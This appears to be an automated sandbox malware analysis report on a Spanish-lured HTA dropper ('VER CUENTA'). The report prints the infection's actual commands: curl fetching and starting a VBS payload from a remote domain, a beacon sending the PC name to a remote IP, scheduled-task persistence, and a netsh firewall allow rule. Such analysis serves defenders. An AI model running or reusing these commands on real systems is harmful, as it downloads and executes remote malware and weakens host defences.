Windows Analysis Report
#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta

Overview

General Information

Sample name: #U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta
renamed because original name is a hash value
Original sample name: VER CUENTA_.hta
Analysis ID: 1544419
MD5: 1f0b20b8e1b9c0267af0a33368e1d6c7
SHA1: 4c0f0f757d4f84daaa301f8bf96648171eda3cdb
SHA256: 2a1bb69cee435a0cd61bc70387717fce0109108ec1d2e8cf79304a01a602a527

Detection

Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

System process connects to network (likely due to code injection or exploit)
Modifies the windows firewall
Potential malicious VBS script found (has network functionality)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: WScript or CScript Dropper
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication

Classification


Networking

Source: C:\Windows\SysWOW64\wscript.exe Network Connect: 109.234.39.156 80
Source: C:\Windows\SysWOW64\curl.exe Dropped file: adodbStream.Write xmlhttp.ResponseBody Jump to dropped file
Source: C:\Windows\SysWOW64\curl.exe Dropped file: adodbStream.SaveToFile destinationFolder & "\downloaded.zip", 2 Jump to dropped file
Source: global traffic HTTP traffic detected:
    GET /mod-mx282/mx2810.zip HTTP/1.1
    Accept: */*
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 109.234.39.156
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /mx/mx2810.php?nomepc=user-PC HTTP/1.1
    Accept: */*
    Accept-Language: en-ch
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: 109.234.39.156
    Connection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 109.234.39.156
Source: global traffic HTTP traffic detected:
    HTTP/1.1 200 OK
    Date: Tue, 29 Oct 2024 10:57:26 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Last-Modified: Fri, 25 Oct 2024 12:51:08 GMT
    ETag: "2600dc2-6254c92a08700"
    Accept-Ranges: bytes
    Content-Length: 39849410
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/zip
    Data Raw: 50 4b 03 04 14 00 00 00 08 00 1c 4e 59 59 c9 28 78 92 a7 5e 06 02 00 80 90 04 08 00 00 00 37 7a 78 61 2e 64 6c 6c cc 3b 6b 6c 5b e7 75 87 97 14 5f a2 64 52 92 13 d7 b1 67 c5 96 5d d9 92 95 d8 92 3d 25 51 5d d2 a2 64 2b d1 83 b6 a8 c7 5a 03 36 2d 5e 49 9c 28 92 bb bc b4 e5 21 5d 3c 34 05 d2 c2 d8 8c c6 09 d2 56 49 bc 4c 49 83 24 1d bc 4d 43 85 2d 18 fc 23 0b 8c 40 45 3d cc 03 f2 c3 40 bd 41 18 e2 20 18 bc d6 6b dc ce 19 77 ce f7 7d f7 45 52 0f 5a 29 b0 0b 48 e7 de f3 9d f7 f7 fe ce c7 be 6f 44 40 02 00 07 6c 80 7c 1e 60 01 f8 13 84 cd b0 ea 63 03 f8 7b 3f 54 6f 9b f7 fc ec d1 05 5b ef cf 1e bd 78 31 3a 99 c8 d6 67 94 f4 84 12 9b ae 9f ce 65 d5 fa d3 72 bd 92 4b d5 e7 52 71 59 a9 1f 49 a4 5a f7 57 79 1b 7e 1f fe 9f 3c 91 2e 80 5e 9b 17 16 5e 7c 64 42 c3 dd 02 e9 d1 4a 9b f4 15 f8 de 5b 76 f8 e5 6d 86 bb 33 87 ef 7e 7c b9 f2 96 9d a2 c3 de 31 70 4e 56 6a 40 b8 f2 aa 03 83 c9 1e 09 82 36 43 93 9f f3 80 00 97 17 ec 8b 54 7a eb a7 f6 b9 d7 11 9e ff 17 3b ec f9 08 8a 9e ab 0b f6 1b 7f bb 19 ca 7d 36 dd fb a9 dd ff 10 c9 5d b0 ff b0 a6 b8 bc 45 95 67 54 84 1f ff fb 9b dc af 25 84 0e 2b 4d 3d c0 a9 96 04 27 dc f2 26 61 d0 f7 b7 10 7c f2 a6 bd 88 2e 1e 53 63 f8 fe c2 37 1d 3c 46 27 10 fe d9 5b 16 3a 8c da d5 96 d3 d9 2c bd 2f 5d f5 61 20 de b5 43 e9 e7 6a 4b 82 0b 9c 7b 9d c7 08 2e 23 fc f4 9d 62 79 71 4e f8 c3 1a ee 2b d4 21 fc de bb c5 74 32 97 b7 68 e3 b1 67 8d fe b5 22 ba 60 8b c2 e9 ba 08 71 45 d0 5d 2e 45 27 27 d3 63 00 ac 6e b0 8e 60 1e e1 1b 45 74 87 5b 94 ac 32 46 1f 7b 3e 32 ea 78 f8 c3 22 79 ec c5 dc 86 e8 39 7f d1 b1 22 dd 97 f0 38 fc 41 b0 bb 0e a7 d3 49 39 96 62 ad 95 fd 43 6c 45 77 2c 99 95 1d 51 25 27 3b 07 cf 65 55 79 9a 42 d1 86 25 92 3b 94 ca 26 3a 27 63 0a a3 cd b3 a6 4e 7d 09 cb 3c 0e c2 33 f7 f2 79 81 9f 44 bc cd 3d 38 99 56 d4 9e 94 0a e7 f3 f9 fc 73 1a cf f3 bc 6c 3a 96 4c 62 99 a4 15 b2 b2 cb 54 e6 42 b4 3c 21 2b 14 09 56 28 c1 02 e1 1d 87 cf a9 b2 55 ff 75 86 1f 49 2b 71 ab fe 4f 98 8e ce 98 12 4f a4 62 c9 0a 5e 96 cf b3 32 47 20 08 75 ae 48 3a 81 5a 14 e0 92 36 21 ce 5f 81 7a 0f b6 11 46 28 ce 73 e5 f8 b4 53 b9 73 c8 4c 00 54 aa 09 1d c5 72 9b a7 3f a6 26 ce c8 48 64 b2 1c 40 a5 32 2f 2f 23 09 66 6b 2e 62 99 c3 39 98 48 4d 24 65 b2 e3 32 7d bb bb 66 54 19 c7 ce b8 c4 74 cf 33 9a 70 3a 77 3a 29 db 10 f3 01 7d 3b 3a d3 d3 19 3b 2b bf c1 78 3a 73 8a 22 a7 c6 ce 39 b8 ff 88 ab a8 64 f1 1f 54 15 14 8f ca ee 93 df 9e 88 56 91 8f 53 b5 12 6d 5d 0d c3 8f 24 e2 32 e1 7b 35 7c 33 e2 ed 6e 8a 39 b5 15 2d 26 cf 35 d6 2c d3 50 4e 30 7a aa 0b a2 97 34 fa d1 e5 e8 2f 30 fa de 74 6a 82 e8 f5 90 bd b0 1c fd fb 58 50 e3 cc 32 77 48 fa 22 7e 57 7a c9 ec 41 1d 77 0b 71 5e 2f b9 c8 71 54 b9 77 11 e7 73 0d c7 94 44 8c 9a 1b 38 6a f1 db 3b 90 94 0d 1
Source: global traffic DNS traffic detected: DNS query: acess.mailcffemx.com
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown HTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.195.227:443 -> 192.168.2.16:49714 version: TLS 1.2

System Summary

Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{13709620-C279-11CE-A49E-444553540000}
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: classification engine Classification label: mal96.evad.winHTA@51/13@1/27
Source: C:\Windows\SysWOW64\mshta.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\AN5UOLP8\6720bdf227263[1].js
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1308$432c4c
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$17d0
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6996:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_6096
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5400:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe File created: C:\Users\user\AppData\Local\Temp\BLOCKBUSTER.madExcept
Source: Yara match File source: 0000001D.00000000.1560866719.0000000000401000.00000020.00000001.01000000.00000010.sdmp, type: MEMORY
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Desktop\#U2749VER CUENTA#U2749_#U2467#U2464#U2465#U2466#U2465#U2466#U2463#U2462.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -k -o C:\Users\Public\6720bdf2273b1.vbs https://acess.mailcffemx.com//6720bdf2272bc/6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\6720bdf2273b1.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\6720bdf2273b1.vbs"
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\_6720bdf2272bc\BLOCKBUSTER.exe "C:\_6720bdf2272bc\BLOCKBUSTER.exe"
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "BLOCKBUSTER"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\_6720bdf2272bc\BLOCKBUSTER.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "BLOCKBUSTER" /TR "C:\_6720bdf2272bc\BLOCKBUSTER.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="BLOCKBUSTER" dir=in action=allow program="C:\_6720bdf2272bc\BLOCKBUSTER.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msiso.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: srpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msimtf.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dataexchange.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dcomp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: jscript9.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxcore.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\curl.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: uxtheme.dll
